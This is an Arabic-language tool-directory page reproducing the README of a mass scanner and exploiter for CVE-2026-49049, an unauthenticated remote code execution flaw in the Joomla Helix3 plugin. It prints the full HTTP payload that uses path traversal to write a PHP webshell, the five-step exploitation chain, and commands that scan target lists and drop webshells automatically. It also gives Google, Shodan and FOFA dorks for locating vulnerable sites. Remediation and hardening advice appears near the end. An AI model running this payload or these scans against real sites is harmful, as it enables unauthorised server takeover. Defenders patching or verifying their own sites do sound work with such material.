Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-49049 — ماسح CVE-2026-49049 Helix3 (JoomShaper) Joomla لثغرة تنفيذ الكود عن بُعد عبر AJAX بدون مصادقة | Kitploit
أدوات/GitHubGitHub/exdev994/cve-2026-49049
الاستطلاعماسحات الثغرات الأمنيةتوليد الحمولةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubexdev994/cve-2026-49049

CVE-2026-49049

ماسح CVE-2026-49049 Helix3 (JoomShaper) Joomla لثغرة تنفيذ الكود عن بُعد عبر AJAX بدون مصادقة

عرض المستودع
2منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-49049 — ماسح RCE غير مصادق عليه عبر AJAX لـ Helix3 (JoomShaper) على Joomla

CVE CVSS Python License Author

ماسح / مدقّق جماعي لثغرة CVE-2026-49049: معالج AJAX غير مصادق عليه في إضافة Helix3 Framework الخاصة بـ Joomla (v1.0 – 3.1.0، تم تصحيحها في 3.1.1+).

للاستخدام المصرّح به فقط. استخدمها فقط على أنظمة تملكها أو لديك إذن كتابي لاختبارها.


Table of Contents

  • نظرة عامة على الثغرة
  • سلسلة استغلال RCE
  • التثبيت
  • طريقة الاستخدام (Usage)
  • مثال على المخرجات
  • دلائل الاستطلاع (Dorks)
  • طريقة الإصلاح (المعالجة)
  • هيكل المشروع
  • المساهمة
  • المراجع
  • إخلاء المسؤولية

نظرة عامة على الثغرة

يمكن الوصول إلى المعالج onAjaxHelix3() في plugins/ajax/helix3/helix3.php عبر com_ajax في Joomla دون مصادقة / رمز CSRF:

root@kitploit:~
POST /index.php?option=com_ajax&plugin=helix3&format=json
Content-Type: application/x-www-form-urlencoded

data[action]=save&data[layoutName]=../../up.php&data[content]=<?php system($_GET['cmd']); ?>

سلسلة استغلال RCE

الاستغلال الجماعي النشط في البيئة الحقيقية غالبًا ما يُسقط قشرة ويب (webshell) مزدوجة الامتداد:

  1. كشف Helix3 + إصدار < 3.1.1
  2. save مع layoutName=../../up.php + محتوى قشرة ويب PHP
  3. الحفظ يُلحق .json → يصل up.php.json إلى جذر الويب
  4. AddHandler متعدد الامتدادات في Apache ينفّذ رمز .php
  5. GET /up.php.json?cmd=id → uid=33(www-data) = SHELL OK
root@kitploit:~
Detect Helix3
    → POST com_ajax?plugin=helix3 (action=save, traversal)
    → up.php.json written
    → GET up.php.json?cmd=id
    → uid=33(www-data)

التثبيت

root@kitploit:~
git clone https://github.com/ExDev994/CVE-2026-49049.git
cd CVE-2026-49049
pip install -r requirements.txt

المتطلبات: requests>=2.31.0, colorama>=0.4.6, Python 3.9+.


طريقة الاستخدام (Usage)

1. جهّز الهدف

عدّل targets.txt — رابط URL / مضيف واحد لكل سطر (# = تعليق). مسار Joomla يُحتفظ به:

root@kitploit:~
# contoh
https://example.com/
https://example.com/joomla/
http://192.168.1.50/

2. فحص للقراءة فقط (كشف فقط)

لا يُنشئ قشرة ويب. يفحص الإصدار + يختبر save / remove / import:

root@kitploit:~
python3 scan.py -f targets.txt --scan -o results.txt

3. تلقائي: كشف + إنشاء قشرة ويب + التحقق من RCE

root@kitploit:~
python3 scan.py -f targets.txt --auto -c "id" -o results.txt

4. هدف واحد

root@kitploit:~
python3 scan.py -t https://target.tld/joomla/ --auto -c "id"

5. خيارات متقدمة

root@kitploit:~
# Keep webshell setelah verify (demo authorized)
python3 scan.py -f targets.txt --auto --keep

# Custom webshell name + traversal depths
python3 scan.py -f targets.txt --auto \
  --webshell-name up.php \
  --traversal-depths "../../,../../../"

# JSON report + concurrency
python3 scan.py -f targets.txt --auto -c "whoami" \
  --threads 20 --timeout 15 \
  -o results.txt --json report.json

# Proxy (Burp / etc)
python3 scan.py -t https://target.tld/ --scan --proxy http://127.0.0.1:8080

العلامات (Flags) المهمة

تحذير: وضع --auto يحاول كتابة قشرة ويب عبر اجتياز المسار. الافتراضي: تُحذف القشرة بعد التحقق. استخدم --keep فقط للتجارب المصرّح بها.


مثال على المخرجات

الطرفية تعرض كل الحالات (التقدم). results.txt يحتوي فقط على الثغرات:

root@kitploit:~
[v] CVE-2026-49049 SHELL OK  https://target.tld  Helix3 2.5.6  save=Y remove=Y import=N
[id] -> uid=33(www-data) gid=33(www-data) groups=33(www-data)
    shell: https://target.tld/up.php.json?cmd=id
[ ] VULN (no shell)         https://target.tld  Helix3 3.0.2  save=Y remove=Y import=Y

التسميات الأخرى (PATCHED, NOT_HELIX3, TIMEOUT, UNKNOWN) تظهر في الطرفية فقط، ولا تُكتب في results.txt.


دلائل الاستطلاع (Dorks)

استخدم دلائل البحث أدناه للعثور على أصول Helix3 / Joomla التي يحتمل تأثرها. امسح الأهداف المصرّح بها فقط.

Google

root@kitploit:~
inurl:templates/shaper_helix3/templateDetails.xml
inurl:"templates/shaper_helix3"
"shaper_helix3" "Joomla"
inurl:index.php?option=com_ajax "helix3"
"powered by Helix" Joomla
intitle:"Home" "shaper_helix3"
inurl:/templates/helix3/

Shodan

root@kitploit:~
http.html:"shaper_helix3"
http.html:"Helix3" http.html:"Joomla"
http.title:"Joomla" "shaper_helix3"
http.html:"/templates/shaper_helix3/"
http.html:"joomshaper" product:"Joomla"
html:"plg_system_helix3"

FOFA

root@kitploit:~
body="shaper_helix3"
body="/templates/shaper_helix3/" && body="Joomla"
body="Helix3" && body="joomshaper"
body="plg_ajax_helix3" || body="onAjaxHelix3"
title="Joomla" && body="shaper_helix3"
body="templateDetails.xml" && body="helix3"

بصمة يدوية (بعد الحصول على المضيف)

root@kitploit:~
# Version check
curl -sk 'https://TARGET/templates/shaper_helix3/templateDetails.xml' | grep -i version

# Unauth save probe (authorized only)
curl -sk -X POST \
  'https://TARGET/index.php?option=com_ajax&plugin=helix3&format=json' \
  -d 'data[action]=save&data[layoutName]=_test_probe&data[content]={"probe":"test"}'

طريقة الإصلاح (المعالجة)

1. حدّث فورًا (إلزامي)

حدّث إضافتي System – Helix3 Framework و Helix3 – Ajax إلى 3.1.1 أو أحدث (يُوصى بـ 3.1.2).

  • لوحة Joomla الخلفية → System → Update / Extensions
  • أو حمّل الحزمة الرسمية من JoomShaper وثبّتها يدويًا

2. إذا تم الاختراق / التشويه بالفعل

التحديث لا ينظف الحمولات التي دخلت قاعدة البيانات بالفعل.

  1. لوحة الخلفية → Site Template Styles → قالب Helix3 النشط
  2. افتح Custom Code — واحذف السكربتات الغريبة في Custom JavaScript / CSS / Before Head
  3. افحص جدول #__template_styles عمود params بحثًا عن custom_js / custom_css مُحقنة
  4. احذف الملفات المشبوهة في جذر الويب / templates / tmp / media:
    • up.php.json, cox.json, *.php.json, وأي قشرة ويب أخرى
  5. غيّر بيانات اعتماد المسؤول، وراجع حسابات المستخدمين، ودقق cron / المهام المجدولة

علامات الاختراق الشائعة: تشويه "Hacked by AntonKill" / "trenggalek6etar"، وحقن custom_js، وملفات JSON غير معروفة.

3. التحصين (دفاع متعمق)

Apache — لا تستخدم AddHandler متعدد الامتدادات؛ استخدم:

root@kitploit:~
<FilesMatch "\.php$">
    SetHandler application/x-httpd-php
</FilesMatch>

Nginx:

root@kitploit:~
location ~ \.php$ {
    try_files $uri =404;
    fastcgi_pass unix:/run/php/php-fpm.sock;
}

PHP php.ini:

root@kitploit:~
disable_functions = system,exec,shell_exec,passthru,proc_open,popen,pcntl_exec

الرفع / كتابة الملفات: أعد توليد أسماء الملفات، وارفض الامتدادات متعددة النقاط، وAllowOverride None في الدلائل العامة.

4. التحقق بعد التحديث

root@kitploit:~
python3 scan.py -t https://YOUR-SITE/ --scan
# Expected: PATCHED  Helix3 3.1.1+  (atau NOT_HELIX3 jika plugin di-uninstall)

هيكل المشروع

root@kitploit:~
CVE-2026-49049/
├── scan.py              # CLI entry point
├── core/
│   ├── engine.py        # ThreadPoolExecutor + results (vuln-only to file)
│   ├── probe.py         # Helix3 detect + save/remove/import + RCE drop
│   └── target.py        # Parse / normalize targets.txt
├── utils/
│   └── banner.py
├── targets.txt          # Input targets
├── results.txt          # Generated (VULN / SHELL_OK only)
├── requirements.txt
└── README.md

المساهمة

المساهمات من المجتمع مقبولة. المشرف: ExDev994.

Guidelines

  • لا ترفع أهدافًا حية / نتائج فحص / قشر ويب / بيانات اعتماد
  • لا تُضعف تحذير "الاختبار المصرّح به فقط"
  • يُفضَّل الطلبات الصغيرة (اهتمام واحد لكل PR)
  • اتبع نمط Python الموجود (from __future__ import annotations, type hints)
  • اختبر محليًا: python3 -m py_compile scan.py core/*.py utils/*.py و python3 scan.py --help

Issues

أبلغ عن الأخطاء / طلبات الميزات في Issues. أرفق:

  • إصدار Python ونظام التشغيل
  • الأمر المنفَّذ
  • المخرجات / traceback (احذف الأهداف الحساسة)

المساهمون

المساهمالدور
ExDev994Author / Maintainer

الثغرة أبلغ عنها في الأصل Phil Taylor (mySites.guru). هذا المستودع تنفيذ مستقل للماسح وليس تابعًا لـ JoomShaper أو Open Source Matters.


المراجع

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-49049
  • Advisory (mySites.guru): https://mysites.guru/blog/helix3-security-update-changelog-failure/
  • JoomShaper Helix3: https://www.joomshaper.com/
  • مرجع PoC للقراءة فقط: https://github.com/shinthink/CVE-2026-49049
  • هذا المستودع: https://github.com/ExDev994/CVE-2026-49049

إخلاء المسؤولية

هذه الأداة لأغراض تعليمية واختبار أمني مصرّح به فقط.

الوصول غير المصرّح به إلى أنظمة الحاسوب غير قانوني وقد ينتهك قوانين منها UU ITE الإندونيسي، وCFAA الأمريكي، والقوانين المماثلة في ولايات قضائية أخرى.

المؤلف (ExDev994) لا يتحمل أي مسؤولية عن سوء الاستخدام. باستخدامك هذا البرنامج فأنت تقبل المسؤولية الكاملة عن أفعالك. وضع --auto يُنشئ قشرة ويب مؤقتة — استخدمها فقط على أهداف مصرّح بها.

تنزيل الأداة
الإجراءالتأثيرالإصدارات
saveكتابة ملف JSON عشوائي + اجتياز المسار1.0 – 3.1.0
removeحذف ملف عشوائي (بدون تقييد على الامتداد/المسار)1.0 – 3.1.0
importاستبدال وسائط القالب في قاعدة البيانات (custom_js غير مُهرَّب → XSS/تشويه)v3.x فقط
إصدار Helix3save / removeimportالحالة
1.0 – 2.xضعيفغير موجودضعيف
3.0 – 3.1.0ضعيفضعيفضعيف
3.1.1+مُصحَّحمُصحَّحآمن
العلامةالوصف
-f / --fileملف قائمة الأهداف (الافتراضي: targets.txt إذا غاب -t)
-t / --targetرابط هدف واحد
--scanكشف للقراءة فقط
--autoكشف + تحقق RCE (الافتراضي)
-c / --cmdأمر التحقق (الافتراضي: id)
-o / --outputملف النتائج — الأهداف VULN / SHELL_OK فقط
--jsonتقرير JSON منظم
--keepعدم الحذف التلقائي للقشرة بعد التحقق
--threadsعدد العمال المتزامنين (الافتراضي: 15)
--timeoutمهلة HTTP بالثواني (الافتراضي: 15)